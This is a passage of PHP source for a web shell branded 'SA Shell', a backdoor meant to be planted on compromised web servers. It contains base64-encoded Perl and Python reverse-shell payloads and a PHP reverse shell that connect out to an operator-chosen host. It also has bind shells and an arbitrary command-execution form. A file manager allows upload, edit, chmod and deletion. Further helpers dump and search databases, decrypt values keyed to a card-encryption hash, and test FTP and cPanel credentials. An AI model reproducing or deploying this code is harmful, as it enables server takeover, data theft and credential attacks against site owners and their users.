$back_perl="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGlhZGRyPWluZXRfYXRvbigkQVJHVlswXSkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRBUkdWWzFdLCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgnL2Jpbi9zaCAtaScpOw0KY2xvc2UoU1RESU4pOw0KY2xvc2UoU1RET1VUKTsNCmNsb3NlKFNUREVSUik7";
$back_py = "IyEvdXNyL2Jpbi9lbnYgcHl0aG9uIC11DQoNCmltcG9ydCBzeXMsIHNvY2tldCwgb3MNCg0KaWYgbGVuKHN5cy5hcmd2KSAhPSAzOg0KIHByaW50ICJbeF0gVXNvOiAlcyBbaG9zdF0gW3BvcnRdIiAlIChzeXMuYXJndlswXSkNCmVsc2U6DQogaG9zdCA9IHN0cihzeXMuYXJndlsxXSkNCiBwb3J0ID0gaW50KHN5cy5hcmd2WzJdKQ0KIGhhbmRsZXIgPSBzb2NrZXQuc29ja2V0KHNvY2tldC5BRl9JTkVULCBzb2NrZXQuU09DS19TVFJFQU0pDQogdHJ5Og0KICB0cnk6DQogICBpZiBvcy5mb3JrKCkgPiAwOiBvcy5fZXhpdCgwKQ0KICBleGNlcHQgT1NFcnJvciwgZXJyb3I6DQogICBwcmludCAnRXJyb3IgRW4gRm9yazogJWQgKCVzKScgJSAoZXJyb3IuZXJybm8sIGVycm9yLnN0cmVycm9yKQ0KICAgcGlkID0gb3MuZm9yaygpDQogICBpZiBwaWQgPiAwOg0KICAgIHByaW50ICdGb3JrIE5vIFZhbGlkbyEnDQogIGhhbmRsZXIuY29ubmVjdCgoaG9zdCwgcG9ydCkpDQogIG9zLmR1cDIoaGFuZGxlci5maWxlbm8oKSwgc3lzLnN0ZGluLmZpbGVubygpKQ0KICBvcy5kdXAyKGhhbmRsZXIuZmlsZW5vKCksIHN5cy5zdGRvdXQuZmlsZW5vKCkpDQogIHdoaWxlIGhhbmRsZXIucmVjdjoNCiAgIGhhbmRsZXIuc2VuZGFsbCgoJ1xuW1NhdWRpIFNoM2xsXSM+JykpDQogICBvcy5zeXN0ZW0oJy9iaW4vYmFzaCcpDQogZXhjZXB0Og0KICBwcmludCAiWyFdIEVycm9yIGNvbm5lY3Rpb24i";

////////////////////////// php ///////////////////////
if ($op == 'php')
{

$sockfd=fsockopen($ip , $port , $errno, $errstr );

 if($errno != 0)
        {
            echo "$errno : $errstr";
        }
        else if (!$sockfd)
        {
               $result = "error connect!</p>";
        }
        else
        {
            fputs ($sockfd ,
            "
/################################\
#                                #
#           SA Shell             #
#                                #
#     Edited by AZZATSSINS       #
#                                #
\################################/");
         $pwd = shell_exec("pwd");
         $sysinfo = shell_exec("uname -a");
         $id = shell_exec("id");
         $len = 1337;
         fputs($sockfd ,$sysinfo . "\n" );
         fputs($sockfd ,$pwd . "\n" );
         fputs($sockfd ,$id ."\n\n" );
         while(!feof($sockfd))
         {
            $cmdPrompt ="(Saudi sh3ll)[$]> ";
            fputs ($sockfd , $cmdPrompt );
            $command= fgets($sockfd, $len);
            fputs($sockfd , "\n" . shell_exec($command) . "\n\n");
         }
         fclose($sockfd);
        }

echo "End Connect";
exit;
}


elseif ($op == 'perl')
{


op_sa("/tmp/sa.pl",$back_perl);
            $out = cmd("perl /tmp/sa.pl ".$ip." ".$port." 1>/dev/null 2>&1 &");
            sleep(1);
            echo "<pre>$out\n".cmd("ps aux | grep sa.pl")."</pre>";
            unlink("/tmp/sa.pl");


}


elseif ($op == 'python')
{


op_sa("/tmp/sa.py",$back_py);
            $out = cmd("python /tmp/sa.py ".$ip." ".$port." 1>/dev/null 2>&1 &");
            sleep(1);
            echo "<pre>$out\n".cmd("ps aux | grep sa.py")."</pre>";


}

}
else if ($_POST['con'] == 'Connect bind'){
/////////////////////// bind /////////////////////

if ($op == 'perl')
{


$bind_port = $_POST['bind_port'];

op_sa("/tmp/sa.pl",$bind_perl);
            $out = cmd("perl /tmp/sa.pl ".$bind_port." 1>/dev/null 2>&1 &");
            sleep(1);
            echo "<pre>$out\n".cmd("ps aux | grep sa.pl")."</pre>";
            unlink("/tmp/sa.pl");


}

else if ($op == 'python')
{


$bind_port = $_POST['bind_port'];

op_sa("/tmp/sa.py",$bind_py);
            $out = cmd("python /tmp/sa.py ".$bind_port." 1>/dev/null 2>&1 &");
            sleep(1);
            echo "<pre>$out\n".cmd("ps aux | grep sa.py")."</pre>";
            unlink("/tmp/sa.py");


}


}}


break;

}

}
else
{
/////////// File Manager //////////////

$sws = 'azzatssins' ;
if ($sws != 'azzatssins'){echo "Coded by azzatssins"; exit;}

if(@$_GET['dir']){
    $dir = $_GET['dir'];
    if($dir != 'nullz') $dir = @cleandir($dir);
}

$curdir = @cleandir(@getcwd());
$self = $_SERVER['PHP_SELF'];
$me = $_SERVER['PHP_SELF'];

if($dir=="") $dir = $curdir;
    $dirx = explode(DIRECTORY_SEPARATOR, $dir);
    $files = array();
    $folders = array();
    echo"<br /><div class='t33p'><table cellpadding='0' align='center' width='100%' >";
    echo"<tr><td style=\"text-align: left\" >";
    echo" Your path : &nbsp;";
    for($i=0;$i<count($dirx);$i++){
        @$totalpath .= $dirx[$i] . DIRECTORY_SEPARATOR;
        echo("<a href='" . $me . "?dir=$totalpath" . "'>$dirx[$i]</a>" . DIRECTORY_SEPARATOR);
    }
    echo "<td></tr></table></div><br />";
    echo"<div class='t3p'><table cellpadding='0' align='center' width='100%' >";
    echo"<tr><td>Name</td><td>Size</td><td>Modify</td><td>Owner/Group</td><td>Permissions</td><td>Option<td></td></tr>";
    if ($handle = @opendir($dir)) {
        while (false != ($link = readdir($handle))) {
               $on3 = @posix_getpwuid(@fileowner($dir."/".$link)) ;
               $gr = @posix_getgrgid(@filegroup($dir."/".$link));
            if (@is_dir($dir . DIRECTORY_SEPARATOR . $link)){
                $file = array();
                @$file['link'] = "<a href='$me?dir=$dir" . DIRECTORY_SEPARATOR . "$link'>[ $link ]</font></a>";
                $file['pir'] = "<a href='?azzatssins=chmod&file=$link&dir=$dir'\">".@wsoPermsColor($dir."/".$link)."</a>";
                $file['pir2'] = "<a href='?azzatssins=chmod&file=$link&dir=$dir'\">".@perm($dir."/".$link)."</a>";

                $folder = "<tr><td> ".$file['link']."</td><td>dir</td><td>".date('Y-m-d H:i:s', @filemtime($dir."/".$link))."</td><td>".$on3['name']."/".$gr['name']."</td><td>".$file['pir']."&nbsp;&nbsp;&nbsp;".$file['pir2']."<td><a href='?azzatssins=rname&file=$link&dir=$dir'\">R</a> - <a href='?azzatssins=chmod&file=$link&dir=$dir'\">C</a> - <a href='?azzatssins=rm&file=$link&dir=$dir'\">rm</a></td></td></tr></div>" ;

                array_push($folders, $folder);
            }
            else{
                $file = array();
                $ext = @strpos($link, ".") ? @strtolower(end(explode(".", $link))) : "";
                 $file['pir'] = "<a href='?azzatssins=chmod&file=$link&dir=$dir'\">".@wsoPermsColor($dir."/".$link)."</a>";
                 $file['pir2'] = "<a href='?azzatssins=chmod&file=$link&dir=$dir'\">".@perm($dir."/".$link)."</a>";
                 $file['size'] = @number_format(@filesize($dir."/".$link)/1024,2);
                   @$file['link'] = "<a href='?azzatssins=edit&file=$link&dir=$dir'\">".$link ."</a>";
                 $file = "<tr><td>".$file['link']."</td><td>".$file['size']."</td><td>".date('Y-m-d H:i:s', @filemtime($dir."/".$link))."</td><td>".$on3['name']."/".$gr['name']."</td><td>".$file['pir']."&nbsp;&nbsp;&nbsp;".$file['pir2']."<td><a href='?azzatssins=edit&file=$link&dir=$dir'\">E</a> - <a href='?azzatssins=rname&file=$link&dir=$dir'\">R</a> - <a href='?azzatssins=chmod&file=$link&dir=$dir'\">C</a> - <a href='?azzatssins=dow&file=$link&dir=$dir'\">D</a> - <a href='?azzatssins=rm&file=$link&dir=$dir'\">rm</a></td></td></tr></div>" ;
                array_push($files, $file);
            }

        }
         asort($folders);
         asort($files);

        foreach($folders as $folder) echo $folder;
       foreach($files as $file) echo $file;
        echo "</table></div>" ;
        closedir($handle);


}


}


if ($_GET['azzatssins'] == 'rname')
{

$dir = $_GET['dir'];

$file = $_GET['file'];

if (!isset($file) or !isset ($dir)){ echo "<br /><br /><a href='$pg'\">[ Back ]</a>"; exit;}

if (!isset($_POST['edit']))
{

echo "<br />
<div class=\"cont3\">  <a href='?azzatssins=edit&file=$file&dir=$dir'\">Edit</a>&nbsp;&nbsp;&nbsp;<a href='?azzatssins=rname&file=$file&dir=$dir'\">Rename</a>&nbsp;&nbsp;<a href='?azzatssins=chmod&file=$file&dir=$dir'\">Chmod</a>&nbsp;&nbsp;<a href='?azzatssins=dow&file=$file&dir=$dir'\">Download</a>
<a href='?azzatssins=rm&file=$file&dir=$dir'\">Delete</a></div><br />
dir : <a href='$pg?dir=".$_GET['dir']."'>".$_GET['dir']."</a>&nbsp;&nbsp;&nbsp; file name : ".$_GET['file']."  <br /> <br />
<form method='post'>
new name : <input type='text' value='$file' name='name'  /><br /><br />
<input type='submit' value='edit' name='edit' />

</form>

 ";
}else
{

$new = $_POST['name'];

$rn = @rename ($dir."/".$file,$dir."/".$new);

if(!$rn)
{


@cmd("cd $dir;mv $file $new ");


}else
{

echo "<br /><br />Name change successfully";

echo "<br /><br /><a href='?azzatssins=rname&file=$new&dir=$dir'\">[ Back ]</a>";

}


}
}


if ($_GET['azzatssins'] == 'chmod')
{

$dir = $_GET['dir'];

$file = $_GET['file'];

if (!isset($file) or !isset($dir)){ echo "<br /><br /><a href='$pg'\">[ Back ]</a>"; exit;}

if (!isset($_POST['edit']))
{

echo "<br />
<div class=\"cont3\">  <a href='?azzatssins=edit&file=$file&dir=$dir'\">Edit</a>&nbsp;&nbsp;&nbsp;<a href='?azzatssins=rname&file=$file&dir=$dir'\">Rename</a>&nbsp;&nbsp;<a href='?azzatssins=chmod&file=$file&dir=$dir'\">Chmod</a>&nbsp;&nbsp;<a href='?azzatssins=dow&file=$file&dir=$dir'\">Download</a>
<a href='?azzatssins=rm&file=$file&dir=$dir'\">Delete</a></div><br />
dir : <a href='$pg?dir=".$_GET['dir']."'>".$_GET['dir']."</a>&nbsp;&nbsp;&nbsp; file name : ".$_GET['file']."  <br /> <br />
<form method='post'>
File to chmod: <input type='text' value=".$dir."/".$file." name='file' />&nbsp;&nbsp;&nbsp;<select name=\"ch\">
<option value=\"755\">755</option>
<option value=\"777\">777</option>
<option value=\"644\">644</option>
</select>
<br /><br /><input type='submit' value='chmod' name='edit' />

</form>

 ";
}
else
{

$pir = $_POST['ch'];

if ($pir == '755'
)

{
   $cd = @chmod($_POST['file'],0775);
}
elseif ($pir == '777')
       {
   $cd = @chmod($_POST['file'],0777);

       }
elseif ($pir == '644')
{

$cd = $cd = @chmod($_POST['file'],0644);

}

if(!$cd)
{
echo "ERROR";

}else
{

echo "changed Successfully";
echo "<br /><br /><a href='?azzatssins=chmod&file=$file&dir=$dir'\">[ Back ]</a>";


}

}
}

if ($_GET['azzatssins'] == 'edit')
{

$file = $_GET['file'];
$dir = $_GET['dir'];

if (!isset($file) or !isset($dir)){ echo "<br /><br /><a href='$pg'\">[ Back ]</a>"; exit;}

if (!isset($_POST['ed']))
{

$fil33 = @fopen($dir."/".$file, 'r');
$content = @fread($fil33, @filesize($dir."/".$file));

echo "
<div class=\"cont3\">  <a href='?azzatssins=edit&file=$file&dir=$dir'\">Edit</a>&nbsp;&nbsp;&nbsp;<a href='?azzatssins=rname&file=$file&dir=$dir'\">Rename</a>&nbsp;&nbsp;<a href='?azzatssins=chmod&file=$file&dir=$dir'\">Chmod</a>&nbsp;&nbsp;<a href='?azzatssins=dow&file=$file&dir=$dir'\">Download</a>
<a href='?azzatssins=rm&file=$file&dir=$dir'\">Delete</a></div>
<br />
dir : <a href='$pg?dir=".$_GET['dir']."'>".$_GET['dir']."</a>&nbsp;&nbsp;&nbsp; file name : ".$_GET['file']."  <br /> <br />
<form method=\"post\">
<br /><textarea cols=\"85\" rows=\"25\" name=\"fil3\">";
echo htmlentities($content) . "\n";
echo '
</textarea>
<br /><br />
<input type="submit" name="ed" value="Save !"/>
</form>

';

}
else
{


$oo = @fopen($dir."/".$file, 'w');
      $ow =   @fwrite($oo, @stripslashes($_POST['fil3']));
        @fclose($oo);
        if (!$ow){echo "Error";}else {
          echo header("Location: ?azzatssins=edit&file=$file&dir=$dir");
          }


}


}
else if ($_GET['azzatssins'] == 'dow')
{
$file = $_GET['file'];
$dir = $_GET['dir'];

@sa_download ($dir."/".$file);


}
/////////////////////////////////////////////////////
if ($_GET['azzatssins'] == 'rm')
{

$dir = $_GET['dir'];

$file = $_GET['file'];

if (!isset($file) or !isset ($dir)){ echo "<br /><br /><a href='$pg'\">[ Back ]</a>"; exit;}

if (!isset($_POST['edit']))
{

echo "<br />
<div class=\"cont3\">  <a href='?azzatssins=edit&file=$file&dir=$dir'\">Edit</a>&nbsp;&nbsp;&nbsp;<a href='?azzatssins=rname&file=$file&dir=$dir'\">Rename</a>&nbsp;&nbsp;<a href='?azzatssins=chmod&file=$file&dir=$dir'\">Chmod</a>&nbsp;&nbsp;<a href='?azzatssins=dow&file=$file&dir=$dir'\">Download</a>
<a href='?azzatssins=rm&file=$file&dir=$dir'\">Delete</a></div>
<br />
dir : <a href='$pg?dir=".$_GET['dir']."'>".$_GET['dir']."</a>&nbsp;&nbsp;&nbsp; file name : ".$_GET['file']."  <br /> <br />
<form method='post'>
<input type='submit' value='Delete' name='edit' />

</form>

 ";
}else
{


$rn = @unlink ($dir."/".$file);

if(!$rn)
{


$rn = @rmdir ($dir."/".$file);


}elseif (!$rn)
{
 $rn =  @cmd("cd $dir;rm $file");

}
else if (!$rn){@cmd ("cd $dir;rm -r $file");}
else{

echo header("Location: $pg?dir=$dir");
}

echo header("Location: $pg?dir=$dir");

}
}
///////////////////////////////////////////////////////////////////////////////// mkdir //////////////////////////////

else if ($_GET['azzatssins'] == 'mkdir')
{


$dir = $_POST['dir'];
$file = $_POST['n4me'];

$mkdir = @mkdir ($dir."/".$file,0755);

if (!$mkdir){@cmd ("mkdir $dir/$file ");}else {header("Location: $pg?dir=$dir"); }
header("Location: $pg?dir=$dir");

}


else if ($_GET['azzatssins'] == 'mkfile')
{

$dir = $_POST['dir'];
$file = $_POST['n4me'];


$mkdir = @fopen($dir."/".$file,'w');

if (!$mkdir){@cmd ("touch $dir/$file ");}else {header("Location: $pg?dir=$dir"); }


}

else if ($_GET['azzatssins'] == 'up')
{


$dir = $_POST['dir'];


if(@move_uploaded_file($_FILES['upfile']['tmp_name'], $dir."/".$_FILES['upfile']['name'])) { header("Location: $pg?dir=$dir"); }
    else { echo '<br /><br />Not uploaded !!<br><br>';exit; }

}


//////////////////////////// read file /////////////////////

else if ($_GET['azzatssins'] == 'rfile')
{


$file = $_POST['n4me'];

echo "dir : <a href='$pg?dir=".$_GET['dir']."'>".$_GET['dir']."</a>&nbsp;&nbsp;&nbsp; file name : ".$_GET['file']."  <br /> <br />  ";

if (!isset($file)){$file = $_GET['dir']."/".$_GET['file'];}

echo "<div>";

$r3ad = @fopen($file, 'r');
if ($r3ad){
$content = @fread($r3ad, @filesize($file));
echo "<pre>".htmlentities($content)."</pre>";
}
else if (!$r3ad)
{
echo "<pre>";
$r3ad = @show_source($file) ;
echo "</pre>";
}
else if (!$r3ad)
{
echo "<pre>";
$r3ad = @highlight_file($file);
echo "</pre>";
}
else if (!$r3ad)
{
echo "<pre>";
$sm = @symlink($file,'sym.txt');


if ($sm){
$r3ad = @fopen('sym.txt', 'r');
$content = @fread($r3ad, @filesize($dir."/".$file));
echo "<pre>".htmlentities($content)."</pre>";
}
}

echo "</div>";

//////////////////////// cmd /////////////////////////////////


}else if ($_GET['azzatssins'] == 'cmd')
{
$cmd = $_POST['n4me'];
$dir = $_POST['dir'];

if (isset($cmd))
{


echo "<br /><textarea cols='65' rows='25' name='fil3'> ";

echo @cmd("cd $dir;$cmd") ;

echo " </textarea>";


}


}
else if ($_GET['azzatssins'] == 'site')
{


$read = @file_get_contents("http://networktools.nl/reverseip/$ips") ;

$sit3 = @findit($read,"<pre>","</pre>");

echo "<br /><div class='site'><pre> ";


echo $sit3;

echo "</pre> </div>";

exit;


}


if(@$_GET['dir']){
    $dir = $_GET['dir'];
    if($dir != 'nullz') $dir = cleandir($dir);
}

echo "

<br /><br />
</div><div class='d0n'>
<br /><br />
<table align=\"center\" cellpadding=\"0\" cellspacing=\"0\" width=\"80%\"   >

<tr><td><form method='GET''>
Change dir : <br />
<input type='text' name='name' value='$dir' size='25' />
<input type='hidden'  name='dir' value='$dir' />

<input type='submit' value='Go' />
</form> </td>

<td style=\"float: left\">  <form method='POST' action='$pg?azzatssins=mkdir' >

Make dir :<br />
<input type='text' name='n4me' size='25' />
<input type='hidden'  name='dir' value='$dir' />
<input type='submit' value='Go' /></div>
</form></td></tr>


<tr><td><form method='post' action='$pg?azzatssins=rfile'>
read file : <br />
<input type='text' name='n4me' size='25' />
<input type='hidden'  name='dir' value='$dir' />
<input type='submit' value='Go' />
</form> </td>


<td style=\"float: left\">  <form method='post'  action='$pg?azzatssins=mkfile' >

Make file :<br />
<div style=\"text-align: right\">
<input type='text' name='n4me' size='25' />
<input type='hidden'  name='dir' value='$dir' />
<input type='submit' value='Go' /></div>
</form></td></tr>


<tr><td><form method='POST' action='$pg?azzatssins=cmd'>
Execute : <br />
<input type='text' name='n4me' size='25' />
<input type='hidden'  name='dir' value='$dir' />
<input type='submit' value='Go' />
</form> </td>
<b></b>


<td style=\"float: left\">
<form method='POST' enctype=\"multipart/form-data\" action='$pg?azzatssins=up' >
Upload file :<br />
<div style=\"text-align: right\">
<input type='file' name='upfile' value='Choose file' size='21' />
<input type='hidden'  name='dir' value='$dir' />
<input type='submit' value='Up' />
</form></td></tr>


</table>
 </div>
";
//////////////////////////////////////// exit :d //////////////////////////


function cmd($cfe)
{
 $res = '';
 if (!empty($cfe))
 {
  if(function_exists('exec'))
   {
    @exec($cfe,$res);
    $res = join("\n",$res);
   }
  elseif(function_exists('shell_exec'))
   {
    $res = @shell_exec($cfe);
   }
  elseif(function_exists('system'))
   {
    @ob_start();
    @system($cfe);
    $res = @ob_get_contents();
    @ob_end_clean();
   }
  elseif(function_exists('passthru'))
   {
    @ob_start();
    @passthru($cfe);
    $res = @ob_get_contents();
    @ob_end_clean();
   }
  elseif(@is_resource($f = @popen($cfe,"r")))
  {
   $res = "";
   while(!@feof($f)) { $res .= @fread($f,1024); }
   @pclose($f);
  }
 }
 return $res;
}

function sa($i)
{
return @str_repeat("&nbsp;",$i);
}


function decrypt ($string,$cc_encryption_hash)
{
    $key = md5 (md5 ($cc_encryption_hash)) . md5 ($cc_encryption_hash);
    $hash_key = _hash ($key);
    $hash_length = strlen ($hash_key);
    $string = base64_decode ($string);
    $tmp_iv = substr ($string, 0, $hash_length);
    $string = substr ($string, $hash_length, strlen ($string) - $hash_length);
    $iv = $out = '';
    $c = 0;
    while ($c < $hash_length)
    {
        $iv .= chr (ord ($tmp_iv[$c]) ^ ord ($hash_key[$c]));
        ++$c;
    }

    $key = $iv;
    $c = 0;
    while ($c < strlen ($string))
    {
        if (($c != 0 AND $c % $hash_length == 0))
        {
            $key = _hash ($key . substr ($out, $c - $hash_length, $hash_length));
        }

        $out .= chr (ord ($key[$c % $hash_length]) ^ ord ($string[$c]));
        ++$c;
    }

    return $out;
}


function _hash ($string)
{
    $hash = (function_exists ('sha1')) ? sha1($string):md5($string);
    $out = '';
    $c = 0;
    while ($c < strlen ($hash))
    {
        $out .= chr (hexdec ($hash[$c] . $hash[$c + 1]));
        $c += 2;
    }
    return $out;
}

function backup_tables($path,$host,$user,$pass,$name,$tables = '*')
{

  $link = @mysql_connect($host,$user,$pass);
  @mysql_select_db($name,$link);

  //get all of the tables
  if($tables == '*')
  {
    $tables = array();
    $result = @mysql_query('SHOW TABLES');
    while($row = @mysql_fetch_row($result))
    {
      $tables[] = $row[0];
    }
  }
  else
  {
    $tables = is_array($tables) ? $tables : explode(',',$tables);
  }

  //cycle through
  foreach($tables as $table)
  {
    $result = mysql_query('SELECT * FROM '.$table);
    $num_fields = mysql_num_fields($result);

       $row2 = mysql_fetch_row(mysql_query('SHOW CREATE TABLE '.$table));
       $return.= "\n\n".$row2[1].";\n\n";

    for ($i = 0; $i < $num_fields; $i++)
    {
      while($row = mysql_fetch_row($result))
      {
        $return.= 'INSERT INTO '.$table.' VALUES(';
        for($j=0; $j<$num_fields; $j++)
        {
          $row[$j] = addslashes($row[$j]);
          $row[$j] = ereg_replace("\n","\\n",$row[$j]);
          if (isset($row[$j])) { $return.= '"'.$row[$j].'"' ; } else { $return.= '""'; }
          if ($j<($num_fields-1)) { $return.= ','; }
        }
        $return.= ");\n";
      }
    }
    $return.="\n\n\n";
  }

  //save file
  $handle = @fopen($path,'w+');
  @fwrite($handle,$return);
  @fclose($handle);
}

function search($string){
    $q = mysql_query("SHOW TABLE STATUS");
    $data = array();
    while($table = mysql_fetch_array($q)){
        $query = "SELECT * FROM $table[Name]";
        $result = mysql_query($query);
        $row = @mysql_fetch_assoc($result);
        if(!$row){
            continue;
        }
        $columns = array_keys($row);
        $data[$table['Name']] = $columns;
    }
    $tables = array();
    foreach($data as $table=>$columns){
        $query = "SELECT * FROM `$table` WHERE ";
        foreach($columns as $key=>$column){
            if($key == 0){
                $query .= "`$column` LIKE '%$string%'";
            }else{
                $query .= " OR `$column` LIKE '%$string%'";
            }
        }
        $query = mysql_query($query);
        $result = mysql_num_rows($query);
        if($result > 0){
            $tables[] = $table;
        }
    }
    $founded = array();
    foreach($tables as $table){
        $columns = $data[$table];
        foreach($columns as $column){
            $query = "SELECT * FROM `$table` WHERE `$column` LIKE '%$string%'";
            $query = mysql_query($query);
            $result = mysql_num_rows($query);
            if($result > 0){
                $founded[] = array('table'=>$table,'column'=>$column);
            }
        }
    }
    return $founded;
}

    function cleandir($d){ // Function to clean up the $dir and $curdir variables
    $d = @realpath($d);
    $d = str_replace("\\\\", "\\", $d);
    $d = str_replace("////", "//", $d);
    return($d);
}

function wsoPermsColor($f) {
    if (!@is_readable($f))
        return '<font color=#FF0000>' . @wsoPerms(@fileperms($f)) . '</font>';
    elseif (!@is_writable($f))
        return '<font color=white>' . @wsoPerms(@fileperms($f)) . '</font>';
    else
        return '<font color=#25ff00>' . @wsoPerms(@fileperms($f)) . '</font>';
}

function wsoPerms($p) {
    if (($p & 0xC000) == 0xC000)$i = 's';
    elseif (($p & 0xA000) == 0xA000)$i = 'l';
    elseif (($p & 0x8000) == 0x8000)$i = '-';
    elseif (($p & 0x6000) == 0x6000)$i = 'b';
    elseif (($p & 0x4000) == 0x4000)$i = 'd';
    elseif (($p & 0x2000) == 0x2000)$i = 'c';
    elseif (($p & 0x1000) == 0x1000)$i = 'p';
    else $i = 'u';
    $i .= (($p & 0x0100) ? 'r' : '-');
    $i .= (($p & 0x0080) ? 'w' : '-');
    $i .= (($p & 0x0040) ? (($p & 0x0800) ? 's' : 'x' ) : (($p & 0x0800) ? 'S' : '-'));
    $i .= (($p & 0x0020) ? 'r' : '-');
    $i .= (($p & 0x0010) ? 'w' : '-');
    $i .= (($p & 0x0008) ? (($p & 0x0400) ? 's' : 'x' ) : (($p & 0x0400) ? 'S' : '-'));
    $i .= (($p & 0x0004) ? 'r' : '-');
    $i .= (($p & 0x0002) ? 'w' : '-');
    $i .= (($p & 0x0001) ? (($p & 0x0200) ? 't' : 'x' ) : (($p & 0x0200) ? 'T' : '-'));
    return $i;
}

function perm($file)
{
 if(file_exists($file))
 {
  return @substr(@sprintf('%o', @fileperms($file)), -4);
 }
 else
 {
  return "????";
 }
}

function sa_download($path)
    {
    header('Content-Description: File Transfer');
    header('Content-Type: application/octet-stream');
    header('Content-Disposition: attachment; filename='.basename($path));
    header('Content-Transfer-Encoding: binary');
    header('Expires: 0');
    header('Cache-Control: must-revalidate, post-check=0, pre-check=0');
    header('Pragma: public');
    header('Content-Length: ' . filesize($path));
    ob_clean();
    flush();
    readfile($path);
    exit;
    }

    function findit($mytext,$starttag,$endtag) {
 $posLeft  = @stripos($mytext,$starttag)+strlen($starttag);
 $posRight = @stripos($mytext,$endtag,$posLeft+1);
 return  @substr($mytext,$posLeft,$posRight-$posLeft);
}

function MsSQL()
{
    if(@function_exists('mssql_connect'))
    {
        $msSQL = '<font color="red">ON</font>';
    }
    else
    {
        $msSQL = '<font color="green">OFF</font>';
    }
    return $msSQL;
}
function MySQL2()
{
    $mysql_try = @function_exists('mysql_connect');
    if($mysql_try)
    {
        $mysql = '<font color="red">ON</font>';
    }
    else
    {
        $mysql = '<font color="green">OFF</font>';
    }
    return $mysql;
}
function Gzip()
{
    if (@function_exists('gzencode'))
    {
        $gzip = '<font color="red">ON</font>';
    }
    else
    {
        $gzip = '<font color="green">OFF</font>';
    }
    return $gzip;
}
function MysqlI()
{
    if (@function_exists('mysqli_connect'))
    {
        $mysqli = '<font color="red">ON</font>';
    }
    else
    {
        $mysqli = '<font color="green">OFF</font>';
    }
    return $mysqli;
}
function MSQL()
{
    if (@function_exists('msql_connect'))
    {
        $mSql = '<font color="red">ON</font>';
    }
    else
    {
        $mSql = '<font color="green">OFF</font>';
    }
    return $mSql;
}
function PostgreSQL()
{
    if(@function_exists('pg_connect'))
    {
        $postgreSQL = '<font color="red">ON</font>';
    }
    else
    {
        $postgreSQL = '<font color="green">OFF</font>';
    }
    return $postgreSQL;
}

function Oracle()
{
    if(@function_exists('ocilogon'))
    {
        $oracle = '<font color="red">ON</font>';
    }
    else
    {
        $oracle = '<font color="green">OFF</font>';
    }
    return $oracle;
}


function RegisterGlobals()
{
    if(@ini_get('register_globals'))
    {
        $registerg= '<font color="red">ON</font>';
    }
    else
    {
        $registerg= '<font color="green">OFF</font>';
    }
    return $registerg;
}
function HardSize($size)
{
    if($size >= 1073741824)
    {
        $size = @round($size / 1073741824 * 100) / 100 . " GB";
    }
    elseif($size >= 1048576)
    {
        $size = @round($size / 1048576 * 100) / 100 . " MB";
    }
    elseif($size >= 1024)
    {
        $size = @round($size / 1024 * 100) / 100 . " KB";
    }
    else
    {
        $size = $size . " B";
    }
    return $size;
}
function Curl()
{
    if(extension_loaded('curl'))
    {
        $curl = '<font color="red">ON</font>';
    }
    else
    {
        $curl = '<font color="green">OFF</font>';
    }
    return $curl;
}

function magicQouts()
{
    $mag=get_magic_quotes_gpc();
    if (empty($mag))
    {
        $mag = '<font color="green">OFF</font>';
    }
    else
    {
        $mag= '<font color="red">ON</font>';
    }
    return $mag;
}

function openBaseDir()
{
$openBaseDir = @ini_get("open_basedir");
if (!$openBaseDir)
    {
        $openBaseDir = '<font color="green">OFF</font>';
    }
    else
    {
        $openBaseDir = '<font color="red">ON</font>';
    }
    return $openBaseDir;
}

function ftp_check($host,$user,$pass,$timeout){
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, "ftp://$host");
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_HTTPAUTH, CURLAUTH_BASIC);
curl_setopt($ch, CURLOPT_FTPLISTONLY, 1);
curl_setopt($ch, CURLOPT_USERPWD, "$user:$pass");
curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
curl_setopt($ch, CURLOPT_FAILONERROR, 1);
$data = curl_exec($ch);
if ( curl_errno($ch) == 28 ) {

print "<b> Error : Connection timed out </b>";
exit;}

elseif ( curl_errno($ch) == 0 ){

print
"
<b>found username : <font color='#FF0000'> $user </font> - password :
<font color='#FF0000'> $pass </font></b><br>";}curl_close($ch);
exit;}


function cpanel_check($host,$user,$pass,$timeout){
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, "http://$host:2082");
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_HTTPAUTH, CURLAUTH_BASIC);
curl_setopt($ch, CURLOPT_USERPWD, "$user:$pass");
curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
curl_setopt($ch, CURLOPT_FAILONERROR, 1);
$data = curl_exec($ch);
if ( curl_errno($ch) == 28 ) {
print "<b> Error : Connection timed out</b>";
exit;}
elseif ( curl_errno($ch) == 0 ){

print
"
<b>found username : <font color='#FF0000'>$user</font> - password :
<font color='#FF0000'>$pass </font></b><br>"; }curl_close($ch);
exit; }


        function op_sa($f,$t) {
            $w = @fopen($f,"w") or @function_exists('file_put_contents');
            if($w){
                @fwrite($w,@base64_decode($t));
                @fclose($w);
            }
        }


  echo "</td></tr></table></div>| <b class='foter'>SA 5HELL RECODED BY <font color=maroon>AZZATSSINS </a></b>|<b class='foter'> MY TWITTER : <a href='http://twitter.com/#!/AZZATSSINS'>@AZZATSSINS</a></b> | </html> ";


?>